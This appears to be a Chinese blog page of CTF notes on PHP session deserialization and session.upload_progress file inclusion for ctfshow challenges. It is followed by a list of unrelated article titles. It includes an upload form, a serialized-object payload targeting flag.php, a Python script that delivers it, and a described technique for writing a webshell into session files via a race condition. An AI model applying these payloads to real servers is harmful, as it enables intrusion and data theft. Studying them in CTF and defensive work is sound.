当前位置：首页 > news >正文

session 反序列化

news 2025/9/12 5:48:02

原理详解

ctfshow web 263

ctfshow 新手杯剪刀石头布

这里我们可以发现服务器使用的处理器为php_serialize，与当前页面处理器不同，在反序列化的时候会造成一些问题。同时cleanup配置没开，关闭了session自动清理，所以我们不需要进行条件竞争。并且我们可以通过session上传进度来传递我们的反序列化串。再看我们主要用到的类。

1.在线运行得到报文

<!doctype html>
<html>
<body>
<form action="http://793869b1-2080-446e-9066-25f43d926b25.challenge.ctf.show/" method="POST" enctype="multipart/form-data"><input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /><input type="file" name="file" /><input type="submit" />
</form>
</body>
</html>

2.接着上传文件，抓包改数据包，修改文件名为序列化串

<?php
class Game{public $log;public function __construct(){$this->log = "/var/www/html/flag.php";}
}
$a=new Game();
echo serialize($a);
#|O:4:"Game":1:{s:3:"log";s:22:"/var/www/html/flag.php";}
?>

或者用python 发包

import requests
url = 'http://d41097cd-f0aa-47e1-b486-4bd8ec57324a.challenge.ctf.show/'
sessid = {'PHPSESSID':'succ3'
}
data = {'PHP_SESSION_UPLOAD_PROGRESS':'|O:4:"Game":1:{s:3:"log";s:22:"/var/www/html/flag.php";}'
}
file = {'file':'1'
}
req = requests.post(url=url,files=file,data=data,cookies=sessid)
print(req.text)

利用session.upload_progress进行文件包含和反序列化渗透

PHP_SESSION_UPLOAD_PROGRESS进行文件包含 (详细步骤条件竞争)

1在php5.4之后php.ini开始有几个默认选项
1.session.upload_progress.enabled = on
2.session.upload_progress.cleanup = on
3.session.upload_progress.prefix = “upload_progress_”
4.session.upload_progress.name = “PHP_SESSION_UPLOAD_PROGRESS”
5.session.use_strict_mode=off

> 我们可以利用session.upload_progress将木马写入session文件，然后包含这个session文件。不过前提是我们需要创建一个session文件，并且知道session文件的存放位置。因为session.use_strict_mode=off的关系，我们可以自定义sessionID
> linux系统中session文件一般的默认存储位置为 /tmp 或 /var/lib/php/session
> 例如我们在Cookie中设置了PHPSESSID=flag，php会在服务器上创建文件：/tmp/sess_flag，即使此时用户没有初始化session，php也会自动初始化Session。
> 并产生一个键值，为prefix+name的值，最后被写入sess_文件里
> 还有一个关键点就是session.upload_progress.cleanup默认是开启的，只要读取了post数据，就会清除进度信息，所以我们需要利用条件竞争来pass，写一个脚本来完

2.过滤了. 我们必须包含无后缀文件
利用session.upload_progress进行文件包含和反序列化渗透 php中唯一能控制的无后缀session
控制文件名字/tmp/sess_aaa

<?php
if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);$file = str_replace(":", "???", $file);$file = str_replace(".", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

session 反序列化

相关文章：

session 反序列化

PostgreSQL中实现数学中的组合问题

编译和连接

常见分布整理

ubuntu终端命令行下如何使用NetworkManager(netplan)来配置wifi网络

GO学习之 goroutine的调度原理

CUDA学习笔记5——CUDA程序错误检测

虹科 | 解决方案 | 机械免拆压力测试方案

Python数据挖掘实用案例——自动售货机销售数据分析与应用

深度学习技巧应用29-软件设计模式与神经网络巧妙结合，如何快速记忆软件设计模式

中文编程开发语言工具应用案例：ps5体验馆计时收费管理系统软件

绘制核密度估计图

基于深度学习网络的蔬菜水果种类识别算法matlab仿真

UE4 距离场

【SA8295P 源码分析 (四)】26 - QNX Ethernet MAC 驱动之 emac_rx_thread_handler 数据接收线程源码分析

VR全景广告：让消费者体验沉浸式交互，让营销更有趣

论文阅读 | RAFT: Recurrent All-Pairs Field Transforms for Optical Flow

神经网络的发展历史

【单元测试】--单元测试最佳实践

llava1.5-部署

循环冗余码校验CRC码算法步骤+详细实例计算

PPT|230页| 制造集团企业供应链端到端的数字化解决方案：从需求到结算的全链路业务闭环构建

Nuxt.js 中的路由配置详解

C++ Visual Studio 2017厂商给的源码没有.sln文件易兆微芯片下载工具加开机动画下载。

让回归模型不再被异常值“带跑偏“，MSE和Cauchy损失函数在噪声数据环境下的实战对比

JavaScript基础-API 和 Web API

比较数据迁移后MySQL数据库和OceanBase数据仓库中的表

怎么让Comfyui导出的图像不包含工作流信息，

论文阅读笔记——Muffin: Testing Deep Learning Libraries via Neural Architecture Fuzzing

Python 训练营打卡 Day 47